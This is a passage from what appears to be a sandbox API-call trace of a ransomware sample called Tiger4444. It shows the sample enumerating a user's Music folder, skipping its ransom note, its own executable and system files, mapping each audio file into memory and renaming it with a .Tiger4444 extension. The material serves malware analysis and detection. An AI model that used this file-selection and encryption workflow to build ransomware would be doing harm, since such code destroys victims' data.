dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.877] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.877] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.877] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.877] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4d50b90, ftCreationTime.dwHighDateTime=0x1d4cd42, ftLastAccessTime.dwLowDateTime=0xf95e6880, ftLastAccessTime.dwHighDateTime=0x1d4ca2d, ftLastWriteTime.dwLowDateTime=0x805d51f3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.877] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.877] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.878] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.878] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.878] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.878] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x805d51f3, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x805d51f3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x805d51f3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.878] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.878] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.878] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd96838b0, ftCreationTime.dwHighDateTime=0x1d4cbf1, ftLastAccessTime.dwLowDateTime=0x6a9d2580, ftLastAccessTime.dwHighDateTime=0x1d4cafc, ftLastWriteTime.dwLowDateTime=0x6a9d2580, ftLastWriteTime.dwHighDateTime=0x1d4cafc, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dOlY5mI8x96ejt4.m4a", cAlternateFileName="DOLY5M~1.M4A")) returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="Tiger4444.exe") returned -1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2=".") returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="..") returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="windows") returned -1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="bootmgr") returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="pagefile.sys") returned -1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="boot") returned 1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="ids.txt") returned -1 [0045.878] lstrcmpiW (lpString1="dOlY5mI8x96ejt4.m4a", lpString2="NTUSER.DAT") returned -1 [0045.878] lstrcpyW (in: lpString1=0x30aeae6, lpString2="dOlY5mI8x96ejt4.m4a" | out: lpString1="dOlY5mI8x96ejt4.m4a") returned="dOlY5mI8x96ejt4.m4a" [0045.878] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\dOlY5mI8x96ejt4.m4a", dwFileAttributes=0x0) returned 1 [0045.878] lstrlenW (lpString="dOlY5mI8x96ejt4.m4a") returned 19 [0045.878] lstrlenW (lpString="Tiger4444") returned 9 [0045.878] lstrcmpiW (lpString1="6ejt4.m4a", lpString2="Tiger4444") returned -1 [0045.878] lstrlenW (lpString=".dll") returned 4 [0045.878] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.878] lstrlenW (lpString=".lnk") returned 4 [0045.878] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.878] lstrlenW (lpString=".ini") returned 4 [0045.878] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.878] lstrlenW (lpString=".sys") returned 4 [0045.879] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\dOlY5mI8x96ejt4.m4a" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\doly5mi8x96ejt4.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.879] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.879] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13733185268) returned 1 [0045.879] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1224) returned 1 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0045.879] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x2c8 [0045.879] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0xbe0000 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.879] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.880] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13733290312) returned 1 [0045.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0045.880] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.880] CloseHandle (hObject=0x2c8) returned 1 [0045.880] CloseHandle (hObject=0x260) returned 1 [0045.882] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\dOlY5mI8x96ejt4.m4a.Tiger4444") returned 60 [0045.882] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\dOlY5mI8x96ejt4.m4a" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\doly5mi8x96ejt4.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\dOlY5mI8x96ejt4.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\doly5mi8x96ejt4.m4a.tiger4444"), dwFlags=0x1) returned 1 [0045.883] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1232 | out: Addend=0xc6f980) returned 18900496 [0045.883] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4547 [0045.883] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ef2f940, ftCreationTime.dwHighDateTime=0x1d4d3d6, ftLastAccessTime.dwLowDateTime=0x8817ef40, ftLastAccessTime.dwHighDateTime=0x1d4d0f2, ftLastWriteTime.dwLowDateTime=0x8817ef40, ftLastWriteTime.dwHighDateTime=0x1d4d0f2, nFileSizeHigh=0x0, nFileSizeLow=0x2309, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hqVpFTG9IIW eeHIf0.wav", cAlternateFileName="HQVPFT~1.WAV")) returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="Tiger4444.exe") returned -1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2=".") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="..") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="windows") returned -1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="bootmgr") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="pagefile.sys") returned -1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="boot") returned 1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="ids.txt") returned -1 [0045.883] lstrcmpiW (lpString1="hqVpFTG9IIW eeHIf0.wav", lpString2="NTUSER.DAT") returned -1 [0045.883] lstrcpyW (in: lpString1=0x30aeae6, lpString2="hqVpFTG9IIW eeHIf0.wav" | out: lpString1="hqVpFTG9IIW eeHIf0.wav") returned="hqVpFTG9IIW eeHIf0.wav" [0045.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\hqVpFTG9IIW eeHIf0.wav", dwFileAttributes=0x0) returned 1 [0045.884] lstrlenW (lpString="hqVpFTG9IIW eeHIf0.wav") returned 22 [0045.884] lstrlenW (lpString="Tiger4444") returned 9 [0045.884] lstrcmpiW (lpString1="eHIf0.wav", lpString2="Tiger4444") returned -1 [0045.884] lstrlenW (lpString=".dll") returned 4 [0045.884] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0045.884] lstrlenW (lpString=".lnk") returned 4 [0045.884] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0045.884] lstrlenW (lpString=".ini") returned 4 [0045.884] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0045.884] lstrlenW (lpString=".sys") returned 4 [0045.884] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0045.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\hqVpFTG9IIW eeHIf0.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\hqvpftg9iiw eehif0.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.884] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.884] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13733708793) returned 1 [0045.884] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8969) returned 1 [0045.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0045.884] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2610, lpName=0x0) returned 0x2c8 [0045.884] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2610) returned 0xbe0000 [0045.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.885] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13733829381) returned 1 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.885] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0045.885] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.885] CloseHandle (hObject=0x2c8) returned 1 [0045.885] CloseHandle (hObject=0x260) returned 1 [0045.887] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\hqVpFTG9IIW eeHIf0.wav.Tiger4444") returned 63 [0045.887] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\hqVpFTG9IIW eeHIf0.wav" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\hqvpftg9iiw eehif0.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\hqVpFTG9IIW eeHIf0.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\hqvpftg9iiw eehif0.wav.tiger4444"), dwFlags=0x1) returned 1 [0045.887] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=8976 | out: Addend=0xc6f980) returned 18901728 [0045.887] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4548 [0045.887] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5808deb0, ftCreationTime.dwHighDateTime=0x1d4d49c, ftLastAccessTime.dwLowDateTime=0x1a9f7620, ftLastAccessTime.dwHighDateTime=0x1d4c66d, ftLastWriteTime.dwLowDateTime=0x1a9f7620, ftLastWriteTime.dwHighDateTime=0x1d4c66d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IUdpHuiNoyTnhg6M", cAlternateFileName="IUDPHU~1")) returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="Tiger4444.exe") returned -1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2=".") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="..") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="windows") returned -1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="bootmgr") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="pagefile.sys") returned -1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="boot") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="ids.txt") returned 1 [0045.888] lstrcmpiW (lpString1="IUdpHuiNoyTnhg6M", lpString2="NTUSER.DAT") returned -1 [0045.888] lstrcpyW (in: lpString1=0x30aeae6, lpString2="IUdpHuiNoyTnhg6M" | out: lpString1="IUdpHuiNoyTnhg6M") returned="IUdpHuiNoyTnhg6M" [0045.888] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0045.888] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc60fe8 [0045.888] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66448 [0045.888] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad2caac0, ftCreationTime.dwHighDateTime=0x1d4cc2c, ftLastAccessTime.dwLowDateTime=0x555efc10, ftLastAccessTime.dwHighDateTime=0x1d4cbe3, ftLastWriteTime.dwLowDateTime=0x555efc10, ftLastWriteTime.dwHighDateTime=0x1d4cbe3, nFileSizeHigh=0x0, nFileSizeLow=0xabec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iyvNor3BCpFxS.mp3", cAlternateFileName="IYVNOR~1.MP3")) returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="Tiger4444.exe") returned -1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2=".") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="..") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="windows") returned -1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="bootmgr") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="pagefile.sys") returned -1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="boot") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="ids.txt") returned 1 [0045.888] lstrcmpiW (lpString1="iyvNor3BCpFxS.mp3", lpString2="NTUSER.DAT") returned -1 [0045.888] lstrcpyW (in: lpString1=0x30aeae6, lpString2="iyvNor3BCpFxS.mp3" | out: lpString1="iyvNor3BCpFxS.mp3") returned="iyvNor3BCpFxS.mp3" [0045.888] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\iyvNor3BCpFxS.mp3", dwFileAttributes=0x0) returned 1 [0045.888] lstrlenW (lpString="iyvNor3BCpFxS.mp3") returned 17 [0045.888] lstrlenW (lpString="Tiger4444") returned 9 [0045.888] lstrcmpiW (lpString1="CpFxS.mp3", lpString2="Tiger4444") returned -1 [0045.889] lstrlenW (lpString=".dll") returned 4 [0045.889] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0045.889] lstrlenW (lpString=".lnk") returned 4 [0045.889] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0045.889] lstrlenW (lpString=".ini") returned 4 [0045.889] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0045.889] lstrlenW (lpString=".sys") returned 4 [0045.889] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0045.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\iyvNor3BCpFxS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iyvnor3bcpfxs.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.889] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.889] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13734197624) returned 1 [0045.889] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=44012) returned 1 [0045.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.889] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaef0, lpName=0x0) returned 0x2c8 [0045.889] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaef0) returned 0xbe0000 [0045.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.890] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.891] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13734372462) returned 1 [0045.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.891] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.891] CloseHandle (hObject=0x2c8) returned 1 [0045.891] CloseHandle (hObject=0x260) returned 1 [0045.893] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\iyvNor3BCpFxS.mp3.Tiger4444") returned 58 [0045.893] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\iyvNor3BCpFxS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iyvnor3bcpfxs.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\iyvNor3BCpFxS.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\iyvnor3bcpfxs.mp3.tiger4444"), dwFlags=0x1) returned 1 [0045.894] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=44016 | out: Addend=0xc6f980) returned 18910704 [0045.894] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4549 [0045.894] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x461aa600, ftCreationTime.dwHighDateTime=0x1d4d4f3, ftLastAccessTime.dwLowDateTime=0xbc3f3090, ftLastAccessTime.dwHighDateTime=0x1d4d371, ftLastWriteTime.dwLowDateTime=0xbc3f3090, ftLastWriteTime.dwHighDateTime=0x1d4d371, nFileSizeHigh=0x0, nFileSizeLow=0xbdff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T4BI1N3Y4nE.m4a", cAlternateFileName="T4BI1N~1.M4A")) returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="Tiger4444.exe") returned -1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2=".") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="..") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="windows") returned -1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="bootmgr") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="pagefile.sys") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="boot") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="ids.txt") returned 1 [0045.894] lstrcmpiW (lpString1="T4BI1N3Y4nE.m4a", lpString2="NTUSER.DAT") returned 1 [0045.894] lstrcpyW (in: lpString1=0x30aeae6, lpString2="T4BI1N3Y4nE.m4a" | out: lpString1="T4BI1N3Y4nE.m4a") returned="T4BI1N3Y4nE.m4a" [0045.894] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\T4BI1N3Y4nE.m4a", dwFileAttributes=0x0) returned 1 [0045.894] lstrlenW (lpString="T4BI1N3Y4nE.m4a") returned 15 [0045.894] lstrlenW (lpString="Tiger4444") returned 9 [0045.894] lstrcmpiW (lpString1="3Y4nE.m4a", lpString2="Tiger4444") returned -1 [0045.894] lstrlenW (lpString=".dll") returned 4 [0045.894] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0045.894] lstrlenW (lpString=".lnk") returned 4 [0045.895] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0045.895] lstrlenW (lpString=".ini") returned 4 [0045.895] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0045.895] lstrlenW (lpString=".sys") returned 4 [0045.895] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0045.895] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\yxGMwmgC\\T4BI1N3Y4nE.m4a" (normalized: "c:\\users\\fd1hvy\\music\\yxgmwmgc\\t4bi1n3y4ne.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.895] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.895] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13734793258) returned 1 [0045.902] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48639) returned 1 [0045.902] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.902] 